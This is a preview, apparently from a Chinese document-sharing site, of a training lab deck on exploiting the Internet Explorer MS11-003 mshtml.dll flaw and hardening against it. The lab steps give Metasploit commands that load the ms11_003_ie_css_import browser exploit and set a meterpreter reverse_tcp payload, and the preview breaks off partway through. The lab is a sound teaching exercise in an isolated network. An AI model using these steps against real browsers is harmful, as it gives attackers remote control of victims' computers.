Windows系统漏洞--任务(二)操作系统漏洞验证及加固-MS11_003漏洞利用与安全加固.pdf

Windows系统漏洞--任务(二)操作系统漏洞验证及加固-MS11_003漏洞利用与安全加固.pdf

  1. 1、本文档共25页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
Windows系统漏洞 ——MS11_003漏洞利用与安全加固 1 任务场景 目录 2 任务分析 CONTENTS 3 预备知识 4 实验步骤 5 总结思考 01 任务场景 任务场景 • 小王接到磐石公司的邀请对某公司内网进行安全监测,现已确认存在安全问题位于IE浏览器中,攻击者可 能会利用此问题危及运行 Microsoft Internet Explorer 的计算机的安全并获取对该计算机的控制权。 02 任务分析 任务分析 • 本次课程中渗透用户和浏览器的效果直接有效。针对用户客户端进行渗透可分为三部分:内容劫持、捕 获用户输入、社会工程学。内容劫持是指替换被勾连的浏览器中当前页面内容,比如替换被勾连的浏览 器中当前页面中所有的 a元素的href。 03 预备知识 预备知识 • 实验在metasploit下结合XSSF对Microsoft IE浏览器进行渗透测试, “mshtml.dll”事件处理悬挂指针 漏洞(MS11-003) MSHTML.DLL是一个用于解析HTML语言的动态链接库,IE、Outlook、Outlook Express等应用程序都使用了该动态链接库。 • 该漏洞产生的原因:Internet Explorer在事件处理的实现上存在远程代码执行漏洞,攻击者可利用此漏 洞在受影响应用程序中运行任意代码,造成拒绝服务。在处理某些对象操作时,”mshtml.dll”库中的 悬挂指针漏洞可被远程利用。 • 攻击者有可能利用特定的javascript 远程拒绝服务攻击使用该动态链接库的应用程序。MSHTML.DLL使得 javascript 可以处理多个窗口对象。如果一个窗口对象接收数据之后被删除,然后重新初始化, MSHTML.DLL将出错,根据出错现象可以判断出发生了缓冲区溢出。 • 本次课程主要介绍联合metasploit来渗透ie浏览器。 04 实验步骤 实验步骤 渗透机ip地址2 服务器ip地址7 靶机ip地址5 打开网络拓扑,点击启动选项,启动实验虚拟机 使用ifconfig和ipconfig命令分别获取渗透机和靶机的IP地址,使用ping命令进行网络连 通性测试,确保网络可达 实验步骤 使用命令msfconsole打开metasploit渗透测试平台 实验步骤 使用命令search ms11_003搜索ms11_003_ie_css_import ie浏览器mshtml漏洞利用模块 实验步骤 然后使用命令use exploit/windows/browser/ms11_003_ie_css_import对该模块进行调用, 并通过命令show options 查看模块的详细配置参数 实验步骤 使用命令set SRVHOST 4设置本地主机监听的地址(稍后用作漏洞载荷的渗透机服务 器),然后使用命令set URIPATH ui来设置访问模块的具体地址(默认为随机生成),再然后使 用命令set LHOST 4设置载荷模块监听的本地地址,其他选项默认即可 使用命令set payload windows/meterpreter/reverse_tcp来设置载荷模块 实验步骤

您可能关注的文档

文档评论(0)

balala11 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档